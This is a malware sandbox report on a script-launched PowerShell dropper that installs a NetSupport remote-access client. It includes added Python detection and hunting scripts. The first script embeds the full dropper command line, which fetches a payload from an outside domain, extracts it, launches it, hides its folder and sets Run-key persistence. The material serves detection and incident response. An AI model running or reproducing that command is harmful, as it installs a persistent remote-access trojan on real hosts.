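The PowerShell one-liner spawned by wscript.exe is the whole second stage in one command line: download a Base64 blob, decode it, write it as `CXCC.zip` under `%APPDATA%\XOQEKRYWQK<n>` with `n` drawn from `Get-Random -Minimum -5 -Maximum 12`, extract, launch `client32.exe`, mark the directory hidden, and register `client32.exe` under the HKCU Run key as `CJYJHX`. That chain is also what to alert on. The script below is an added example, not part of the report or any Sigma rule: it scores a command line from process-creation telemetry against those indicators (the indicator list and weights are the author's choice) and pulls out the IOCs, including every directory name the random suffix could have produced so a hunt does not stop at the one this run happened to use (`XOQEKRYWQK-5`). The benign command line is constructed.

```python
"""Triage a PowerShell command line for the download / decode / extract /
launch / hide / Run-key dropper pattern and extract its IOCs.

Added example, not part of the sandbox report. DROPPER is the command line
recorded above; BENIGN is constructed. Indicator weights are the author's
choice and are meant as a starting point for a detection, not a rule.
"""
import re

DROPPER = r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;"""
BENIGN = r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command Get-Service -Name Spooler | Select-Object Status"""

# name -> (regex, weight). Each one alone is noise; the combination is the signal.
INDICATORS = {
    "exec_bypass":  (r"-Ex(?:ecutionPolicy)?\s+Bypass", 1),
    "no_profile":   (r"-NoP(?:rofile)?\b", 1),
    "download":     (r"\.DownloadString\(|\.DownloadFile\(|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", 2),
    "base64":       (r"FromBase64String", 2),
    "write_bytes":  (r"WriteAllBytes|Set-Content\s.*-Encoding\s+Byte", 1),
    "zip_extract":  (r"ZipFile\]::ExtractToDirectory|Expand-Archive", 1),
    "appdata_drop": (r"GetFolderPath\('ApplicationData'\)|\$env:APPDATA", 1),
    "hide_dir":     (r"attributes\s*=\s*'Hidden'", 1),
    "launch":       (r"Start-Process", 1),
    "run_key":      (r"CurrentVersion\\Run\b", 2),
}


def triage(cmdline):
    """Score the command line; download plus Run-key persistence is a verdict on its own."""
    hits = {name for name, (pat, _) in INDICATORS.items() if re.search(pat, cmdline, re.I)}
    score = sum(w for name, (_, w) in INDICATORS.items() if name in hits)
    if {"download", "run_key"} <= hits or score >= 6:
        verdict = "dropper"
    elif score >= 3:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "score": score, "hits": sorted(hits)}


def literal_vars(cmdline):
    """$name='literal' assignments, so references such as -Name $v can be resolved."""
    return dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", cmdline))


def resolve(token, env):
    token = token.strip().rstrip(";")
    if token.startswith("$"):
        return env.get(token[1:], token)
    return token.strip("'\"")


def extract_iocs(cmdline):
    env = literal_vars(cmdline)
    iocs = {
        "urls": re.findall(r'https?://[^\s\'"]+', cmdline),
        "dropped_names": re.findall(r"Join-Path\s+\$\w+\s+'([^']+)'", cmdline),
        "run_key": None, "run_value": None, "candidate_dirs": [],
    }
    m = re.search(r"New-ItemProperty\s+-Path\s+(\S+)\s+-Name\s+(\S+)", cmdline, re.I)
    if m:
        iocs["run_key"], iocs["run_value"] = resolve(m.group(1), env), resolve(m.group(2), env)
    # Drop directory is <APPDATA>\<prefix><n>, n from Get-Random (-Maximum is
    # exclusive); enumerate every name the script could have produced.
    prefix = re.search(r"GetFolderPath\('ApplicationData'\)\s*\+\s*'\\?([^']+)'", cmdline)
    rng = re.search(r"Get-Random\s+-Minimum\s+(-?\d+)\s+-Maximum\s+(-?\d+)", cmdline, re.I)
    if prefix and rng:
        lo, hi = int(rng.group(1)), int(rng.group(2))
        iocs["candidate_dirs"] = [f"{prefix.group(1)}{n}" for n in range(lo, hi)]
    return iocs


if __name__ == "__main__":
    for cmd in (DROPPER, BENIGN):
        print(triage(cmd))
    print(extract_iocs(DROPPER))
```

Run it over the CommandLine field of Sysmon event 1 or Security 4688 (with command-line auditing enabled); note that the same chain issued through `-EncodedCommand` needs decoding first, which this example does not do.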
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,11_2_11029BB0
                                Source: PCICL32.DLL.6.drStatic PE information: section name: .hhshare
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD33FD0972 push E95AC8D0h; ret 6_2_00007FFD33FD09C9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD33FD09CA push E85D9E5Dh; ret 6_2_00007FFD33FD09F9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340A45ED push ds; ret 6_2_00007FFD340A45EE
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1116FF15 push ecx; ret 11_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1116AE09 push ecx; ret 11_2_1116AE1C
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6FA26BBF push ecx; ret 11_2_6FA26BD2
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1116FF15 push ecx; ret 13_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1116AE09 push ecx; ret 13_2_1116AE1C
                                Source: msvcr100.dll.6.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\msvcr100.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\remcmdstub.exe
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\pcicapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLL
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6FA07030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,11_2_6FA07030
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,11_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CJYJHX
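Taken together, the file drops, the `NSM.ini` write and the Run value give a host-side footprint for a NetSupport client installed this way: `client32.exe`, `PCICL32.DLL` and `PCICHEK.DLL` with their companions (`HTCTL32.DLL`, `TCCTL32.DLL`, `pcicapi.dll`, `remcmdstub.exe`, `msvcr100.dll`, `NSM.ini`) in a hidden directory under the user's roaming profile, referenced from `HKCU\...\Run`. NetSupport Manager is also a legitimate product, so the check has to separate "the files exist" from "the files exist where an administrator would never put them". The hunt below is an added example and not part of the report; its inputs (a file listing, the set of hidden directories and the Run values) are constructed in the shape a collection script would return them, and the Program Files location used for the legitimate install is an assumption, not something the report shows.

```python
"""Hunt for a NetSupport client dropped the way this report shows: the
client32.exe / PCICL32.DLL / PCICHEK.DLL file set in a hidden directory under
the user profile, started from an HKCU Run value.

Added example, not part of the sandbox report. All inputs are constructed; the
"C:\\Program Files (x86)\\NetSupport\\..." path stands in for a legitimate
install and is an assumption.
"""
import ntpath

# Loader, core client DLL and licence-check DLL: present in every NetSupport client.
CORE = {"client32.exe", "pcicl32.dll", "pcichek.dll"}
# Companions dropped alongside them in this report.
COMPANIONS = {"htctl32.dll", "tcctl32.dll", "pcicapi.dll", "remcmdstub.exe",
              "msvcr100.dll", "nsm.ini"}

# Constructed collection results.
FILES = [
    r"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe",
    r"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLL",
    r"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLL",
    r"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL",
    r"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLL",
    r"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\pcicapi.dll",
    r"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\remcmdstub.exe",
    r"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\msvcr100.dll",
    r"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\NSM.ini",
    r"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\CXCC.zip",
    r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini",
    r"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe",
    r"C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL",
    r"C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLL",
]
HIDDEN_DIRS = {r"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5"}
RUN_VALUES = {
    "CJYJHX": r"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe",
    "OneDrive": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
}


def group_by_dir(files):
    """Directory -> set of lower-cased file names (ntpath handles Windows paths on any OS)."""
    dirs = {}
    for path in files:
        directory, name = ntpath.split(path)
        dirs.setdefault(directory, set()).add(name.lower())
    return dirs


def run_values_pointing_into(directory, run_values):
    """Run values whose command starts inside `directory` (case-insensitive)."""
    prefix = directory.lower().rstrip("\\") + "\\"
    return sorted(name for name, cmd in run_values.items()
                  if cmd.strip('"').lower().startswith(prefix))


def hunt(files, hidden_dirs, run_values):
    """One finding per directory holding the core file set, with the reasons it
    looks like a drop rather than an administrative install."""
    findings = []
    hidden = {d.lower() for d in hidden_dirs}
    for directory, names in group_by_dir(files).items():
        if not CORE <= names:
            continue
        runs = run_values_pointing_into(directory, run_values)
        reasons = []
        if "\\appdata\\" in directory.lower():
            reasons.append("under user profile")
        if directory.lower() in hidden:
            reasons.append("hidden directory")
        if runs:
            reasons.append("HKCU Run persistence")
        findings.append({
            "dir": directory,
            "companions": sorted(names & COMPANIONS),
            "run_values": runs,
            "reasons": reasons,
            "verdict": "suspicious" if reasons else "review",
        })
    return findings


if __name__ == "__main__":
    for f in hunt(FILES, HIDDEN_DIRS, RUN_VALUES):
        print(f["verdict"], f["dir"], f["reasons"], f["run_values"])
```

Matching on the file set rather than the directory name matters here: the directory name is randomised per run (`XOQEKRYWQK` plus a number between -5 and 11 in this sample) and will differ between campaigns, while `client32.exe` cannot run without `PCICL32.DLL` and `PCICHEK.DLL` beside it.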
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,11_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,11_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11113380 IsIconic,GetTickCount,11_2_11113380
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,11_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,11_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,11_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,11_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,11_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,11_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,11_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,11_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,11_2_11024880
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,13_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11113380 IsIconic,GetTickCount,13_2_11113380
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,13_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,13_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,13_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,13_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,13_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,13_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1115BEE0 SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,13_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,13_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11024880 _strncpy,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,13_2_11024880
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,11_2_11029BB0
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6F9F91F0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6FA04F30
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_110B86C0 Sleep,ExitProcess
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_1112AF80 OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,FreeLibrary,CloseServiceHandle
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5441
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4379
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Window / User API: threadDelayed 938
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Window / User API: threadDelayed 419
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Window / User API: threadDelayed 7365
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\remcmdstub.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLL
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Evaded block: after key decision graph_11-87376
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Evaded block: after key decision graph_11-92741
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Evaded block: after key decision graph_11-92343
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Evaded block: after key decision graph_11-92946
